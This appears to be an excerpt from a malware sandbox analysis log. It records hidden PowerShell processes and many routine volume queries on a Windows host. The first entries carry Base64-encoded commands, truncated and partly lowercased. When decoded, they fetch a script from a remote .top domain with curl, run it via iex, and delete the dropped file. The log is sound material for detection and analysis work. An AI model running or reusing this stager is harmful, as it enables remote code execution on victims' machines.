              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -c "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jevycm9yqwn0aw9uuhjlzmvyzw5jzsa9icjdb250aw51zsikcir4vgn3aunqow15qwhlz0nzu3lzdedaedlpnkk5ahrtm1pxwky0zkvqddnmvmdscvriajzhadzpwuw2zuvqz0z0nxpovjdwtwnxzdntohe4ckswwtd6cnnmvia9icqolwpvaw4gkcg2ns4uotapicsgkdk3li4xmjipihwgr2v0lvjhbmrvbsatq291bnqgnsb8icuge1tjagfyxsrffskpowokcwtxakh2ynlbqzbzzmdleup3mdb0c1lmselmwlpvt3djwkplduvvwxhmwwtlewtsyw5pnwpaz0trwu9uszdcyvljcjffyxg1d1bidvhobzlfz0jizfluau1qy01hria9iftpbnrdkedldc1eyxrlic1gb3jtyxqgsegpowokbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugpsbbaw50xshhzxqtrgf0zsatrm9ybwf0ig1tktskjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1qwrkid0gmzskswygkcrscghgmgtuekzzwhhxz0rqy1u1ogjdqxfnzwjkrm1pddu3qw9kuellc05gdk5jcnruz0mzewxjbmhvz0dommf6ytfxum5cwmtvmthjrkzknsaricrscghgmgtuekzzwhhxz0rqy1u1ogjdqxfnzwjkrm1pddu3qw9kuellc05gdk5jcnruz0mzewxjbmhvz0dommf6ytfxum5cwmtvmthjrkzknufkzcatz3qgntkpihskicagicrxa3fqshzieufdmhnmz2v5sncwmhrzwuxisuxawm9pd2naskt1rw9zegzza0t5a1jhbmk1alpns2tzt25ln0jhwulymuvhedv3ueh1we5vouvnqmjkwvrptwpjtudgid0gjhfrcwpidmj5qumwc2znzxlkdzawdhnztehjtfpab093y1pks3vfb1l4zllrs3lrumfuatvqwmdla1lpbks3qmfzsxixrwf4nxdqshvytm85rwdcymrzvglnamnnr0ygkyaxowogicagjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1id0gjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1icsgjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1qwrkic0gnja7cn0grwxzzsb7ciagicakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugpsakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugkyakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdvbzgq7cn07cirxa3fqshzieufdmhnmz2v5sncwmhrzwuxisuxawm9pd2naskt1rw9zegzza0t5a1jhbmk1alpns2tzt25ln0jhwulymuvhedv3ueh1we5vouvnqmjkwvrptwpjtudgid0gswygkftpbnrdkedldc1eyxrlic1gb3jtyxqgsegpicsgmsatz3qgmjmpihsimdaifsbfbhnlihskcwtxakh2ynlbqzbzzmdleup3mdb0c1lmselmwlpvt3djwkplduvvwxhmwwtlewtsyw5pnwpaz0trwu9uszdcyvljcjffyxg1d1bidvhobzlfz0jizfluau1qy01hrn07cirxnhnrm0z2ede4evrvnzzbbvhkegtgelbtuwlttsa9icqolwpvaw4gkcg2ns4uotapicsgkdk3li4xmjipihwgr2v0lvjhbmrvbsatq291bnqgmtigfcalihtby2hhcl0kx30pktskjgjprfdyrdjwykhqid0gqcikjevycm9yqwn0aw9uuhjlzmvyzw5jzsa9icjdb250aw51zsiky3vybcatdxnlyiaiahr0cdovl3jpz3p1dnppm2juejmudg9wlzeucghwp3m9bwludhmxmyigfcbpzxg7cljlbw92zs1jdgvticjdolxvc2vyc1xqdwjsawncrg9jdw1lbnrzxcqojhe0c2szrnz4mth5vfu3nkftwep4a0z6ug1ravnnks5wczeiic1gb3jjzsakika7cgoicg93zxjzagvsbcatbm9wcm9mawxlic1legvjdxrpb25wb2xpy3kgynlwyxnzic1xaw5kb3dtdhlszsb
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -c "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jevycm9yqwn0aw9uuhjlzmvyzw5jzsa9icjdb250aw51zsikcir4vgn3aunqow15qwhlz0nzu3lzdedaedlpnkk5ahrtm1pxwky0zkvqddnmvmdscvriajzhadzpwuw2zuvqz0z0nxpovjdwtwnxzdntohe4ckswwtd6cnnmvia9icqolwpvaw4gkcg2ns4uotapicsgkdk3li4xmjipihwgr2v0lvjhbmrvbsatq291bnqgnsb8icuge1tjagfyxsrffskpowokcwtxakh2ynlbqzbzzmdleup3mdb0c1lmselmwlpvt3djwkplduvvwxhmwwtlewtsyw5pnwpaz0trwu9uszdcyvljcjffyxg1d1bidvhobzlfz0jizfluau1qy01hria9iftpbnrdkedldc1eyxrlic1gb3jtyxqgsegpowokbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugpsbbaw50xshhzxqtrgf0zsatrm9ybwf0ig1tktskjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1qwrkid0gmzskswygkcrscghgmgtuekzzwhhxz0rqy1u1ogjdqxfnzwjkrm1pddu3qw9kuellc05gdk5jcnruz0mzewxjbmhvz0dommf6ytfxum5cwmtvmthjrkzknsaricrscghgmgtuekzzwhhxz0rqy1u1ogjdqxfnzwjkrm1pddu3qw9kuellc05gdk5jcnruz0mzewxjbmhvz0dommf6ytfxum5cwmtvmthjrkzknufkzcatz3qgntkpihskicagicrxa3fqshzieufdmhnmz2v5sncwmhrzwuxisuxawm9pd2naskt1rw9zegzza0t5a1jhbmk1alpns2tzt25ln0jhwulymuvhedv3ueh1we5vouvnqmjkwvrptwpjtudgid0gjhfrcwpidmj5qumwc2znzxlkdzawdhnztehjtfpab093y1pks3vfb1l4zllrs3lrumfuatvqwmdla1lpbks3qmfzsxixrwf4nxdqshvytm85rwdcymrzvglnamnnr0ygkyaxowogicagjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1id0gjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1icsgjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1qwrkic0gnja7cn0grwxzzsb7ciagicakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugpsakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugkyakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdvbzgq7cn07cirxa3fqshzieufdmhnmz2v5sncwmhrzwuxisuxawm9pd2naskt1rw9zegzza0t5a1jhbmk1alpns2tzt25ln0jhwulymuvhedv3ueh1we5vouvnqmjkwvrptwpjtudgid0gswygkftpbnrdkedldc1eyxrlic1gb3jtyxqgsegpicsgmsatz3qgmjmpihsimdaifsbfbhnlihskcwtxakh2ynlbqzbzzmdleup3mdb0c1lmselmwlpvt3djwkplduvvwxhmwwtlewtsyw5pnwpaz0trwu9uszdcyvljcjffyxg1d1bidvhobzlfz0jizfluau1qy01hrn07cirxnhnrm0z2ede4evrvnzzbbvhkegtgelbtuwlttsa9icqolwpvaw4gkcg2ns4uotapicsgkdk3li4xmjipihwgr2v0lvjhbmrvbsatq291bnqgmtigfcalihtby2hhcl0kx30pktskjgjprfdyrdjwykhqid0gqcikjevycm9yqwn0aw9uuhjlzmvyzw5jzsa9icjdb250aw51zsiky3vybcatdxnlyiaiahr0cdovl3jpz3p1dnppm2juejmudg9wlzeucghwp3m9bwludhmxmyigfcbpzxg7cljlbw92zs1jdgvticjdolxvc2vyc1xqdwjsawncrg9jdw1lbnrzxcqojhe0c2szrnz4mth5vfu3nkftwep4a0z6ug1ravnnks5wczeiic1gb3jjzsakika7cgoicg93zxjzagvsbcatbm9wcm9mawxlic1legvjdxrpb25wb2xpy3kgynlwyxnzic1xaw5kb3dtdhlszsb
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
